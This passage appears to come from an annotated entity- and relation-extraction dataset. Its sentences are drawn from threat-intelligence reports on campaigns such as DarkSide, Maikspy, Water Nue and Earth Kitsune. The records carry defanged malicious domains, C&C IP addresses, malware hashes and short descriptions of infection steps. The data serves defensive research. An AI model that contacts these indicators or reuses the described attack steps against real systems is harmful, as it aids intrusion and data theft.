file).","entities":[{"id":51704,"label":"FILEPATH","start_offset":49,"end_offset":61},{"id":51705,"label":"FILEPATH","start_offset":91,"end_offset":102},{"id":51703,"label":"FILEPATH","start_offset":6,"end_offset":17}],"relations":[{"id":1138,"from_id":51703,"to_id":51705,"type":"related-to"},{"id":1139,"from_id":51703,"to_id":51704,"type":"related-to"}],"Comments":[]} {"id":13632,"text":"The code used to obtain user QQ numbers Protecting e-commerce platforms from Water Pamola’s attacks Water Pamola attacked online merchants with an XSS script appended onto online shopping orders.","entities":[{"id":51716,"label":"campaign","start_offset":81,"end_offset":93},{"id":51717,"label":"campaign","start_offset":104,"end_offset":116},{"id":51718,"label":"identity","start_offset":126,"end_offset":142},{"id":51719,"label":"attack-pattern","start_offset":151,"end_offset":154}],"relations":[{"id":1141,"from_id":51717,"to_id":51719,"type":"uses"},{"id":1140,"from_id":51717,"to_id":51718,"type":"targets"}],"Comments":[]} {"id":13640,"text":"A series of ongoing business email compromise (BEC) campaigns that uses spear-phishing schemes on Office 365 accounts has been seen targeting business executives of over 1,000 companies across the world since March 2020.","entities":[{"id":51722,"label":"attack-pattern","start_offset":72,"end_offset":86},{"id":51723,"label":"SOFTWARE","start_offset":98,"end_offset":117},{"id":51724,"label":"TIME","start_offset":203,"end_offset":219},{"id":51725,"label":"identity","start_offset":142,"end_offset":161},{"id":51726,"label":"campaign","start_offset":20,"end_offset":61}],"relations":[{"id":1142,"from_id":51726,"to_id":51722,"type":"uses"},{"id":1143,"from_id":51726,"to_id":51725,"type":"targets"},{"id":1144,"from_id":51726,"to_id":51724,"type":"related-to"}],"Comments":[]} {"id":13641,"text":"The recent campaigns target senior positions in the United States and Canada.","entities":[{"id":51729,"label":"identity","start_offset":28,"end_offset":44},{"id":51731,"label":"location","start_offset":70,"end_offset":76},{"id":51728,"label":"campaign","start_offset":4,"end_offset":20},{"id":51730,"label":"location","start_offset":52,"end_offset":65}],"relations":[{"id":1145,"from_id":51728,"to_id":51729,"type":"targets"},{"id":1146,"from_id":51729,"to_id":51730,"type":"located-at"},{"id":1147,"from_id":51729,"to_id":51731,"type":"located-at"}],"Comments":[]} {"id":13642,"text":"The fraudsters, whom we named “Water Nue,” primarily target accounts of financial executives to obtain credentials for further financial fraud.","entities":[{"id":51732,"label":"threat-actor","start_offset":31,"end_offset":40},{"id":51734,"label":"identity","start_offset":72,"end_offset":92}],"relations":[{"id":1148,"from_id":51732,"to_id":51734,"type":"targets"}],"Comments":[]} {"id":13651,"text":"We first noticed the campaign from a large group of email domains used in phishing attempts.","entities":[{"id":51739,"label":"attack-pattern","start_offset":74,"end_offset":82},{"id":51738,"label":"campaign","start_offset":21,"end_offset":29}],"relations":[{"id":1149,"from_id":51738,"to_id":51739,"type":"uses"}],"Comments":[]} {"id":13653,"text":"In one of the first cases we encountered, the senior financial officer of a bank located in Africa purportedly sent a PDF invoice to a colleague, specifying a bank account in Hong Kong.","entities":[{"id":51742,"label":"identity","start_offset":46,"end_offset":70},{"id":51740,"label":"location","start_offset":92,"end_offset":98},{"id":51741,"label":"location","start_offset":175,"end_offset":184},{"id":51743,"label":"identity","start_offset":135,"end_offset":144}],"relations":[{"id":1150,"from_id":51742,"to_id":51740,"type":"located-at"}],"Comments":[]} {"id":13657,"text":"The attackers use cloud-based email distribution services like SendGrid to deliver emails with a clickable link that redirects targets to a fake Office 365 page.","entities":[{"id":51745,"label":"threat-actor","start_offset":4,"end_offset":13},{"id":51746,"label":"tools","start_offset":63,"end_offset":71}],"relations":[{"id":1151,"from_id":51745,"to_id":51746,"type":"uses"}],"Comments":[]} {"id":13663,"text":"In a July email sent to a C-level executive, we learned that the base domain URL is U10450540[.]ct[.]sendgrid[.]net, with the final URL being *getting-panes[.]sfo2*. Figure 3.","entities":[{"id":51748,"label":"URL","start_offset":84,"end_offset":116},{"id":51749,"label":"URL","start_offset":142,"end_offset":164},{"id":51750,"label":"identity","start_offset":26,"end_offset":43}],"relations":[{"id":1152,"from_id":51750,"to_id":51748,"type":"related-to"},{"id":1153,"from_id":51750,"to_id":51749,"type":"related-to"}],"Comments":[]} {"id":13715,"text":"It is associated with the cyberespionage group BlackTech, which mainly targets technology companies and government agencies in East Asia (specifically Taiwan, and in some instances, Japan and Hong Kong) and is responsible for some infamous campaigns such as PLEAD and Shrouded Crossbow.","entities":[{"id":51763,"label":"threat-actor","start_offset":47,"end_offset":56},{"id":51764,"label":"location","start_offset":127,"end_offset":137},{"id":51765,"label":"location","start_offset":151,"end_offset":157},{"id":51766,"label":"location","start_offset":182,"end_offset":187},{"id":51767,"label":"location","start_offset":192,"end_offset":201},{"id":51768,"label":"campaign","start_offset":258,"end_offset":263},{"id":51772,"label":"identity","start_offset":79,"end_offset":99},{"id":51770,"label":"campaign","start_offset":268,"end_offset":285}],"relations":[{"id":1154,"from_id":51763,"to_id":51772,"type":"targets"},{"id":1155,"from_id":51772,"to_id":51764,"type":"located-at"},{"id":1156,"from_id":51772,"to_id":51765,"type":"located-at"},{"id":1157,"from_id":51772,"to_id":51766,"type":"located-at"},{"id":1158,"from_id":51772,"to_id":51767,"type":"located-at"},{"id":1159,"from_id":51763,"to_id":51768,"type":"related-to"},{"id":1160,"from_id":51763,"to_id":51770,"type":"related-to"}],"Comments":[]} {"id":13800,"text":"Therefore, the first-stage shellcode takes the PID of the Windows Service — which the first-stage shellcode and the succeeding backdoor both inject into — hides the target process, and embeds that PID into the second-stage shellcode.","entities":[{"id":48789,"label":"tools","start_offset":27,"end_offset":37},{"id":48790,"label":"SOFTWARE","start_offset":58,"end_offset":73},{"id":48791,"label":"attack-pattern","start_offset":141,"end_offset":152}],"relations":[{"id":464,"from_id":48789,"to_id":48790,"type":"duplicate-of"},{"id":465,"from_id":48789,"to_id":48791,"type":"uses"}],"Comments":[]} {"id":13913,"text":"It is interesting to note that DarkSide’s ransom note is similar to that of Babuk, which might indicate that these two families share a link.","entities":[{"id":48734,"label":"malware","start_offset":31,"end_offset":42},{"id":48735,"label":"malware","start_offset":76,"end_offset":81}],"relations":[{"id":450,"from_id":48734,"to_id":48735,"type":"related-to"}],"Comments":[]} {"id":13919,"text":"The actors behind Darkside have stated that they avoid targeting companies in certain industries, including healthcare, education, the public sector, and the nonprofit sector.","entities":[{"id":48741,"label":"malware","start_offset":18,"end_offset":27},{"id":48744,"label":"identity","start_offset":0,"end_offset":10}],"relations":[{"id":451,"from_id":48741,"to_id":48744,"type":"attributed-to"}],"Comments":[]} {"id":13921,"text":"Based on Trend Micro data, the US is by far DarkSide’s most targeted country, at more than 500 detections, followed by France, Belgium, and Canada.","entities":[{"id":48745,"label":"malware","start_offset":44,"end_offset":55},{"id":48748,"label":"location","start_offset":127,"end_offset":134},{"id":48747,"label":"location","start_offset":119,"end_offset":125},{"id":48746,"label":"location","start_offset":31,"end_offset":34},{"id":48749,"label":"location","start_offset":140,"end_offset":146}],"relations":[{"id":452,"from_id":48745,"to_id":48746,"type":"targets"},{"id":455,"from_id":48745,"to_id":48749,"type":"targets"},{"id":453,"from_id":48745,"to_id":48747,"type":"targets"},{"id":454,"from_id":48745,"to_id":48748,"type":"targets"}],"Comments":[]} {"id":13922,"text":"As previously mentioned, DarkSide avoids victimizing companies in CIS countries.","entities":[{"id":48750,"label":"malware","start_offset":25,"end_offset":34},{"id":48751,"label":"location","start_offset":66,"end_offset":79}],"relations":[{"id":456,"from_id":48750,"to_id":48751,"type":"related-to"}],"Comments":[]} {"id":13924,"text":"That the group admittedly spares companies in CIS countries could be a clue to where DarkSide actors are residing.","entities":[{"id":48752,"label":"malware","start_offset":85,"end_offset":94},{"id":48753,"label":"location","start_offset":46,"end_offset":59}],"relations":[{"id":457,"from_id":48752,"to_id":48753,"type":"related-to"}],"Comments":[]} {"id":13940,"text":"Jon Clay, Director of Global Threat Communications at Trend Micro, outlines the phases of ransomware: ","entities":[{"id":48758,"label":"identity","start_offset":0,"end_offset":9},{"id":48759,"label":"identity","start_offset":54,"end_offset":65}],"relations":[{"id":458,"from_id":48759,"to_id":48758,"type":"related-to"}],"Comments":[]} {"id":13960,"text":"In a US Senate hearing on cybersecurity threats, Senator Rob Portman of Ohio described the strike on Colonial Pipeline as “potentially the most substantial and damaging attack on US critical infrastructure ever.”","entities":[{"id":48769,"label":"identity","start_offset":49,"end_offset":68},{"id":48768,"label":"identity","start_offset":5,"end_offset":14},{"id":48770,"label":"location","start_offset":72,"end_offset":77},{"id":48771,"label":"location","start_offset":179,"end_offset":182}],"relations":[{"id":459,"from_id":48769,"to_id":48768,"type":"related-to"},{"id":460,"from_id":48769,"to_id":48770,"type":"related-to"}],"Comments":[]} {"id":13996,"text":"While analyzing the technical details of this malware, which includes two new espionage backdoors, we noticed striking similarities to other malware attributed to the threat actor known as APT37, also known as Reaper or Group 123.","entities":[{"id":48781,"label":"threat-actor","start_offset":188,"end_offset":194},{"id":48782,"label":"threat-actor","start_offset":210,"end_offset":217},{"id":48783,"label":"threat-actor","start_offset":220,"end_offset":229}],"relations":[{"id":461,"from_id":48781,"to_id":48782,"type":"duplicate-of"},{"id":462,"from_id":48781,"to_id":48783,"type":"duplicate-of"}],"Comments":[]} {"id":13999,"text":"It is important to note that previous analysis of suspected APT37 activities from different security vendors date from 2016, and the captured samples for the Operation Earth Kitsune have been developed recently.","entities":[{"id":48786,"label":"threat-actor","start_offset":60,"end_offset":66},{"id":48787,"label":"TIME","start_offset":119,"end_offset":123},{"id":48788,"label":"campaign","start_offset":158,"end_offset":182}],"relations":[{"id":463,"from_id":48786,"to_id":48787,"type":"related-to"}],"Comments":[]} {"id":14071,"text":"Figure 9 shows that SLUB used “Windows-RT-KB-2937636.dll,” while Freenki used “Windows-KB275122-x86.exe.” Figure 9 Naming convention for persistence.","entities":[{"id":47392,"label":"FILEPATH","start_offset":79,"end_offset":103},{"id":47389,"label":"FILEPATH","start_offset":31,"end_offset":56},{"id":47395,"label":"malware","start_offset":65,"end_offset":73},{"id":43549,"label":"malware","start_offset":20,"end_offset":24}],"relations":[{"id":316,"from_id":43549,"to_id":47389,"type":"uses"},{"id":317,"from_id":47395,"to_id":47392,"type":"uses"}],"Comments":[]} {"id":14072,"text":" We can see how the Freenki malware, previous SLUB campaigns, and Operation Earth Kitsune share many common TTPs in their delivery and persistence mechanisms.","entities":[{"id":47402,"label":"malware","start_offset":23,"end_offset":31},{"id":47403,"label":"malware","start_offset":49,"end_offset":54},{"id":47425,"label":"campaign","start_offset":69,"end_offset":92}],"relations":[{"id":344,"from_id":47402,"to_id":47403,"type":"related-to"},{"id":345,"from_id":47402,"to_id":47425,"type":"related-to"}],"Comments":[]} {"id":14077,"text":"In the blog describing Operation Earth Kitsune, we noted sites using the GNUBoard Content Management System (CMS) had been compromised and were used to host malware.","entities":[{"id":48008,"label":"campaign","start_offset":23,"end_offset":46},{"id":48009,"label":"SOFTWARE","start_offset":73,"end_offset":90},{"id":48010,"label":"malware","start_offset":157,"end_offset":164}],"relations":[{"id":370,"from_id":48010,"to_id":48009,"type":"compromises"},{"id":376,"from_id":48009,"to_id":48010,"type":"hosts"}],"Comments":[]} {"id":14081,"text":"The SLUB campaign also exploited and used GNUBoard websites as part of the infrastructure.","entities":[{"id":48160,"label":"campaign","start_offset":4,"end_offset":17},{"id":48161,"label":"SOFTWARE","start_offset":42,"end_offset":51}],"relations":[{"id":389,"from_id":48160,"to_id":48161,"type":"exploits"}],"Comments":[]} {"id":14123,"text":"Mattermost was being used as a C2 channel for the malware.","entities":[{"id":48188,"label":"SOFTWARE","start_offset":0,"end_offset":11},{"id":48189,"label":"malware","start_offset":50,"end_offset":57}],"relations":[{"id":390,"from_id":48189,"to_id":48188,"type":"uses"}],"Comments":[]} {"id":14126,"text":"At the same time, we were able to locate the Mattermost server hosted in Greece, and that gave us the current time zone of the Mattermost server.","entities":[{"id":48192,"label":"location","start_offset":73,"end_offset":79},{"id":48191,"label":"Infrastucture","start_offset":127,"end_offset":144},{"id":48193,"label":"Infrastucture","start_offset":45,"end_offset":62}],"relations":[{"id":392,"from_id":48191,"to_id":48192,"type":"located-at"},{"id":393,"from_id":48193,"to_id":48192,"type":"located-at"}],"Comments":[]} {"id":14220,"text":"The payload is a file named loadoerf.ini that contains decryption, run, and code injection functions.","entities":[{"id":48249,"label":"FILEPATH","start_offset":28,"end_offset":40},{"id":48250,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[{"id":394,"from_id":48249,"to_id":48250,"type":"uses"}],"Comments":[]} {"id":14221,"text":"When it is loaded by the system, DLLMain decrypts the payload via CryptUnprotectData.","entities":[{"id":48251,"label":"tools","start_offset":66,"end_offset":84},{"id":48252,"label":"malware","start_offset":33,"end_offset":41}],"relations":[{"id":395,"from_id":48252,"to_id":48251,"type":"uses"}],"Comments":[]} {"id":14253,"text":"Nearly all the C&C servers are hosted in the U.S., while two are located in Japan.","entities":[{"id":48448,"label":"location","start_offset":45,"end_offset":49},{"id":48449,"label":"Infrastucture","start_offset":15,"end_offset":26}],"relations":[{"id":410,"from_id":48449,"to_id":48448,"type":"located-at"}],"Comments":[]} {"id":14259,"text":"Related Hashes (SHA256) detected as BKDR64_WINNTI.ONM: 06b077e31a6f339c4f3b1f61ba9a6a6ba827afe52ed5bed6a6bf56bf18a279ba — cryptbase.dll 1e63a7186886deea6c4e5c2a329eab76a60be3a65bca1ba9ed6e71f9a46b7e9d – loadperf.dll 7c37ebb96c54d5d8ea232951ccf56cb1d029facdd6b730f80ca2ad566f6c5d9b – loadoerf.ini 9d04ef8708cf030b9688bf3e8287c1790023a76374e43bd332178e212420f9fb — wbemcomn.ini b1a0d0508ee932bbf91625330d2136f33344ed70cb25f7e64be0620d32c4b9e2 — cryptbase.ini e5273b72c853f12b77a11e9c08ae6432fabbb32238ac487af2fb959a6cc26089 — wbemcomn.dll Tags Malware | APT & Targeted Attacks | Endpoints | Research","entities":[{"id":48453,"label":"FILEPATH","start_offset":36,"end_offset":53},{"id":48457,"label":"FILEPATH","start_offset":283,"end_offset":295},{"id":48459,"label":"FILEPATH","start_offset":524,"end_offset":537},{"id":48460,"label":"FILEPATH","start_offset":443,"end_offset":456},{"id":48455,"label":"FILEPATH","start_offset":122,"end_offset":135},{"id":48456,"label":"FILEPATH","start_offset":203,"end_offset":215},{"id":48463,"label":"FILEPATH","start_offset":363,"end_offset":376},{"id":44129,"label":"SHA1","start_offset":55,"end_offset":119},{"id":44130,"label":"SHA1","start_offset":136,"end_offset":200},{"id":44131,"label":"SHA1","start_offset":216,"end_offset":280},{"id":44132,"label":"SHA1","start_offset":296,"end_offset":360},{"id":44133,"label":"SHA1","start_offset":376,"end_offset":440},{"id":44134,"label":"SHA1","start_offset":457,"end_offset":521}],"relations":[{"id":412,"from_id":48453,"to_id":48455,"type":"related-to"},{"id":414,"from_id":48456,"to_id":48453,"type":"related-to"},{"id":416,"from_id":48453,"to_id":48457,"type":"related-to"},{"id":415,"from_id":48460,"to_id":48456,"type":"related-to"},{"id":418,"from_id":48453,"to_id":48459,"type":"related-to"},{"id":419,"from_id":44129,"to_id":48455,"type":"related-to"},{"id":420,"from_id":44130,"to_id":48456,"type":"related-to"},{"id":421,"from_id":44132,"to_id":48463,"type":"related-to"},{"id":422,"from_id":44133,"to_id":48460,"type":"related-to"},{"id":423,"from_id":44134,"to_id":48459,"type":"related-to"}],"Comments":[{"id":2,"comment":"Schau mal bitte drüber"}]} {"id":14263,"text":"Our analysis of the latest Maikspy variants revealed that users contracted the spyware from hxxp:\/\/miakhalifagame[.]com\/, a website that distributes malicious apps (including the 2016 adult game) and connects to its C&C server to upload data from infected devices and machines.","entities":[{"id":48474,"label":"malware","start_offset":27,"end_offset":35},{"id":48475,"label":"URL","start_offset":92,"end_offset":120},{"id":48477,"label":"Infrastucture","start_offset":216,"end_offset":226},{"id":48476,"label":"TIME","start_offset":179,"end_offset":183}],"relations":[{"id":424,"from_id":48474,"to_id":48475,"type":"related-to"},{"id":425,"from_id":48475,"to_id":48477,"type":"related-to"},{"id":426,"from_id":48477,"to_id":48474,"type":"related-to"}],"Comments":[]} {"id":14265,"text":"Figure 1. Tweets that mention Virtual Girlfriend and the short link of hxxp:\/\/miakhalifagame[.]com\/ Maikspy on the Android platform Figure 2.","entities":[{"id":48479,"label":"URL","start_offset":71,"end_offset":99},{"id":48480,"label":"malware","start_offset":100,"end_offset":108},{"id":48481,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[{"id":427,"from_id":48479,"to_id":48480,"type":"related-to"},{"id":428,"from_id":48480,"to_id":48481,"type":"targets"}],"Comments":[]} {"id":14267,"text":"Based on the analysis of samples that were last seen in the wild in March 2018, the Maikspy variant (detected by Trend Micro as AndroidOS_MaikSpy.HRX) that runs on Android poses as Virtual Girlfriend to lure users into visiting the attackers’ malicious domain.","entities":[{"id":48487,"label":"malware","start_offset":128,"end_offset":149},{"id":48488,"label":"SOFTWARE","start_offset":164,"end_offset":172},{"id":48486,"label":"identity","start_offset":113,"end_offset":124},{"id":48489,"label":"SOFTWARE","start_offset":181,"end_offset":200},{"id":48484,"label":"TIME","start_offset":68,"end_offset":78},{"id":48485,"label":"malware","start_offset":84,"end_offset":92}],"relations":[{"id":429,"from_id":48487,"to_id":48489,"type":"related-to"},{"id":430,"from_id":48484,"to_id":48485,"type":"related-to"},{"id":431,"from_id":48485,"to_id":48487,"type":"related-to"},{"id":432,"from_id":48487,"to_id":48488,"type":"targets"}],"Comments":[]} {"id":14296,"text":"Maikspy on the Windows platform Figure 7.","entities":[{"id":48501,"label":"malware","start_offset":0,"end_offset":8},{"id":48502,"label":"SOFTWARE","start_offset":15,"end_offset":23}],"relations":[{"id":433,"from_id":48501,"to_id":48502,"type":"targets"}],"Comments":[]} {"id":14297,"text":"Infection chain of Maikspy Windows variant Figure 8.","entities":[{"id":48503,"label":"malware","start_offset":19,"end_offset":27},{"id":48504,"label":"SOFTWARE","start_offset":27,"end_offset":35}],"relations":[{"id":434,"from_id":48503,"to_id":48504,"type":"targets"}],"Comments":[]} {"id":14299,"text":"In the case of the Windows variant (WORM_INFOKEY.A) of Maikspy last seen in April 2017, the user will be tricked into downloading a MiaKhalifa.rar file, which contains the files seen in the screenshot below:","entities":[{"id":48510,"label":"TIME","start_offset":76,"end_offset":86},{"id":48507,"label":"SOFTWARE","start_offset":19,"end_offset":27},{"id":48508,"label":"malware","start_offset":36,"end_offset":50},{"id":48509,"label":"malware","start_offset":55,"end_offset":63},{"id":48511,"label":"FILEPATH","start_offset":132,"end_offset":152}],"relations":[{"id":435,"from_id":48508,"to_id":48509,"type":"related-to"},{"id":436,"from_id":48508,"to_id":48507,"type":"duplicate-of"},{"id":437,"from_id":48509,"to_id":48510,"type":"related-to"},{"id":438,"from_id":48508,"to_id":48511,"type":"related-to"}],"Comments":[]} {"id":14301,"text":"Content of the MiaKhalifa.rar file README.txt provides instructions teaching the user how to turn off the anti-virus software and how to turn on the network, which the attacker needs to steal and upload data to its C&C server.","entities":[{"id":48512,"label":"FILEPATH","start_offset":15,"end_offset":29},{"id":48515,"label":"SOFTWARE","start_offset":106,"end_offset":125},{"id":48513,"label":"FILEPATH","start_offset":34,"end_offset":45},{"id":48514,"label":"Infrastucture","start_offset":215,"end_offset":225}],"relations":[{"id":439,"from_id":48512,"to_id":48513,"type":"related-to"},{"id":440,"from_id":48513,"to_id":48515,"type":"related-to"}],"Comments":[]} {"id":14303,"text":"Content of README.txt register.bat is used to gain administrator privilege.","entities":[{"id":48516,"label":"FILEPATH","start_offset":11,"end_offset":21},{"id":48518,"label":"FILEPATH","start_offset":22,"end_offset":34},{"id":48519,"label":"attack-pattern","start_offset":51,"end_offset":74}],"relations":[{"id":441,"from_id":48518,"to_id":48519,"type":"uses"}],"Comments":[]} {"id":14305,"text":"Code snippet of register.bat Uninstall.exe is a copy of the open-source hacking tool Mimikatz (https:\/\/github[.]com\/gentilkiwi\/mimikatz).","entities":[{"id":48520,"label":"FILEPATH","start_offset":16,"end_offset":28},{"id":48521,"label":"FILEPATH","start_offset":29,"end_offset":42},{"id":48522,"label":"malware","start_offset":88,"end_offset":89},{"id":48524,"label":"URL","start_offset":95,"end_offset":135},{"id":48523,"label":"malware","start_offset":85,"end_offset":94}],"relations":[{"id":442,"from_id":48521,"to_id":48523,"type":"related-to"},{"id":443,"from_id":48520,"to_id":48521,"type":"related-to"},{"id":444,"from_id":48523,"to_id":48524,"type":"related-to"}],"Comments":[]} {"id":14309,"text":"Like the Android Maikspy, it first sends a notification to its C&C server to register the device.","entities":[{"id":48530,"label":"SOFTWARE","start_offset":9,"end_offset":17},{"id":48531,"label":"malware","start_offset":17,"end_offset":24},{"id":48532,"label":"Infrastucture","start_offset":63,"end_offset":73}],"relations":[{"id":445,"from_id":48531,"to_id":48532,"type":"beacons-to"}],"Comments":[]} {"id":14337,"text":"Based on these findings, it’s possible that the attackers behind Maikspy operate \/\/www[.]roundyearfun[.]org\/ and hxxp:\/\/miakhalifagame[.]com\/.","entities":[{"id":48565,"label":"malware","start_offset":65,"end_offset":73},{"id":48568,"label":"URL","start_offset":113,"end_offset":141},{"id":48566,"label":"URL","start_offset":83,"end_offset":108}],"relations":[{"id":446,"from_id":48565,"to_id":48566,"type":"beacons-to"},{"id":447,"from_id":48565,"to_id":48568,"type":"beacons-to"}],"Comments":[]} {"id":14341,"text":"The first variant of Maikspy appeared on the Windows platform in December 2016.","entities":[{"id":48576,"label":"malware","start_offset":21,"end_offset":29},{"id":48578,"label":"TIME","start_offset":65,"end_offset":78},{"id":48577,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[{"id":448,"from_id":48576,"to_id":48577,"type":"duplicate-of"},{"id":449,"from_id":48576,"to_id":48578,"type":"related-to"}],"Comments":[]} {"id":14364,"text":"Figure 21. Connection of Maikspy variants to 107[.]180[.]46[.]243 and hxxp:\/\/fakeomegle[.]com Figure 22. Connection of Maikspy variants to 198[.]12[.]149[.]13and hxxp:\/\/miakhalifagame[.]com\/","entities":[{"id":51779,"label":"URL","start_offset":163,"end_offset":191},{"id":51777,"label":"URL","start_offset":70,"end_offset":93},{"id":51781,"label":"malware","start_offset":120,"end_offset":127},{"id":51778,"label":"IPV4","start_offset":140,"end_offset":159},{"id":51780,"label":"malware","start_offset":25,"end_offset":32},{"id":44372,"label":"IPV4","start_offset":45,"end_offset":65}],"relations":[{"id":1161,"from_id":51780,"to_id":44372,"type":"communicates-with"},{"id":1162,"from_id":51780,"to_id":51777,"type":"communicates-with"},{"id":1163,"from_id":51781,"to_id":51778,"type":"communicates-with"},{"id":1164,"from_id":51781,"to_id":51779,"type":"communicates-with"}],"Comments":[]} {"id":14408,"text":"Leverage WMI for fileless intrusion Execute Powershell script for fileless intrusion","entities":[{"id":47166,"label":"attack-pattern","start_offset":66,"end_offset":84},{"id":44534,"label":"tools","start_offset":44,"end_offset":54}],"relations":[{"id":309,"from_id":44534,"to_id":47166,"type":"uses"}],"Comments":[]}